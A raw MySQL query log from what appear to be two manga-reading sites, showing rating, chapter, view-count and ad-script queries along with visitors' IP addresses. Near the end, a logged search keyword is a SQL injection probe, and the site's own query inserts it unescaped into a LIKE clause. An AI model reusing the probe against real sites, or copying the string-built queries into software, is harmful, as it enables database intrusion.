(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330645774 Quit 330645775 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330645775 Quit 330645776 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330645776 Quit 330645777 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330645777 Quit 330645778 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330645778 Quit 330645779 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330645779 Quit 330645780 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330645780 Quit 330645781 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330645781 Quit 330645782 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330645782 Quit 330645783 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330645783 Quit 330645784 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330645784 Quit 330645785 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330645785 Quit 330645786 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330645786 Quit 330645787 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330645787 Quit 330645788 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330645788 Quit 330645789 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330645789 Quit 330645790 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330645790 Quit 330645791 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330645791 Quit 330645792 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330645792 Quit 330645793 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330645793 Quit 330645794 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330645794 Quit 330645795 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330645795 Quit 330645796 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330645796 Quit 330645797 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330645797 Quit 330645798 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330645798 Quit 330645799 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330645799 Quit 330645800 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330645800 Quit 330645801 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330645801 Quit 330645802 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330645802 Quit 330645803 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330645803 Quit 330645804 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330645804 Quit 330645805 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330645805 Quit 330645806 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330645806 Quit 330645807 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330645807 Quit 330645808 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330645808 Quit 330645809 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330645809 Quit 330645810 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330645810 Quit 330645811 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330645811 Quit 330645812 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330645812 Quit 330645813 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330645813 Quit 330645814 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330645814 Quit 330645815 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330645815 Quit 330645816 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330645816 Quit 330645817 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330645817 Quit 330645818 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330645818 Quit 330645819 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330645819 Quit 330645820 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330645820 Quit 330645821 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330645821 Quit 330645822 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330645822 Quit 330645823 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330645823 Quit 330645824 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330645824 Quit 330645825 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330645825 Quit 330645826 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330645826 Quit 330645827 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330645827 Quit 330645828 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330645828 Quit 330645829 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330645829 Quit 330645830 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330645830 Quit 330645831 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330645831 Quit 330645832 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330645832 Quit 330645833 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330645833 Quit 330645834 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330645834 Quit 330645835 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330645835 Quit 330645836 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330645836 Quit 330645837 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330645837 Quit 330645838 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330645838 Quit 330645839 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330645839 Quit 330645840 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330645840 Quit 330645841 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330645841 Quit 330645842 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330645842 Quit 330645843 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330645843 Quit 330645844 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330645844 Quit 330645845 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330645845 Quit 330645846 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330645846 Quit 330645847 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330645847 Quit 330645848 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330645848 Quit 330645849 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330645849 Quit 330645850 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330645850 Quit 330645851 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330645851 Quit 330645852 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330645852 Quit 330645853 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330645853 Quit 330645854 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330645854 Quit 330645855 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330645855 Quit 330645856 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330645856 Quit 330645857 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330645857 Quit 330645858 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330645858 Quit 330645859 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330645859 Quit 330645860 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330645860 Quit 330645861 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330645861 Quit 330645862 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330645862 Quit 330645863 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330645863 Quit 330645864 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330645864 Quit 330645865 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330645865 Quit 330645866 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330645866 Quit 330645867 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330645867 Quit 330645868 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330645868 Quit 330645869 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330645869 Quit 330645870 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330645870 Quit 330645871 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330645871 Quit 330645872 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330645872 Quit 330645873 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330645873 Quit 330645874 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330645874 Quit 330645875 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645876 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645875 Quit 330645876 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645876 Quit 330645543 Quit 330645877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645877 Quit 330645878 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330645878 Quit 330645879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645879 Quit 330645880 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645880 Quit 330645881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645881 Quit 330645882 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645882 Quit 330645883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645883 Quit 330645884 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645884 Quit 330645885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645885 Quit 330645886 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15289' 330645886 Quit 330645887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645887 Query select * FROM chapters where id = '15289' 330645887 Quit 330645888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645888 Query select * FROM chapters where manga_id = '127' order by id desc 330645888 Quit 330645889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645889 Query Update chapters set view=view+1 where id = '15289' 330645889 Quit 330645890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645890 Query select * FROM chapters where id = '15289' 330645890 Quit 330645891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645891 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15289' 330645891 Quit 330645892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645892 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('127', '15289', '2a02:2788:39:fb2f:2079:67cc:a863:aafe', 'mangacherri.com', '2026-02-26 03:28:42', '2026-02-26 03:28:42') 330645892 Quit 330645893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645893 Query select * FROM chapter_images where chapter_id = '15289' 330645893 Quit 330645894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645894 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '127' and m.active = 1 330645894 Quit 330645895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645895 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='127' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:28:43 330645895 Quit 330645896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645896 Quit 330645897 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330645897 Quit 330645898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645898 Quit 330645899 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645899 Quit 330645900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645900 Quit 330645901 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645901 Quit 330645902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645902 Quit 330645903 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645903 Quit 330645904 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645905 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645904 Quit 330645905 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10073' and m.active = 1 330645905 Quit 330645906 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645906 Query select * FROM chapters where id = '10073' 330645906 Quit 330645907 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645907 Query select * FROM chapters where manga_id = '219' order by display_priority ASC, id desc 330645907 Quit 330645908 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645908 Query Update chapters set view=view+1 where id = '10073' 330645908 Quit 330645909 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645909 Query select * FROM chapters where id = '10073' 330645910 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645909 Quit 330645910 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10073' and m.active = 1 330645910 Quit 330645911 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645911 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('219', '10073', '47.79.200.42', 'mangaberri.com', '2026-02-26 03:28:43', '2026-02-26 03:28:43') 330645911 Quit 330645912 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645912 Query select * FROM chapter_images where chapter_id = '10073' 330645912 Quit 330645913 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645913 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '219' and m.active = 1 330645913 Quit 330645914 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645914 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='219' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Magic%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330645914 Quit 330645915 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645916 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645915 Quit 330645916 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330645916 Quit 330645917 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645918 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645917 Quit 330645918 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645918 Quit 330645919 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645920 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645919 Quit 330645920 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645920 Quit 330645921 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645922 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645921 Quit 330645922 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645922 Quit 330645923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645923 Quit 330645924 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1)ANd//5902((seLecT//CaSe//5902//WHEn//5902//tHeN//1//elsE//0//End//FRom//rdBDATabASe))-- -', '169.150.196.30', '2026-02-26 03:28:43') 330645924 Quit 330645925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645925 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1)ANd//5902((seLecT//CaSe//5902//WHEn//5902//tHeN//1//elsE//0//End//FRom//rdBDATabASe))-- -%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1)ANd//5902((seLecT//CaSe//5902//WHEn//5902//tHeN//1//elsE//0//End//FRom//rdBDATabASe))-- -%' ) ) 330645925 Quit 330645926 Connect 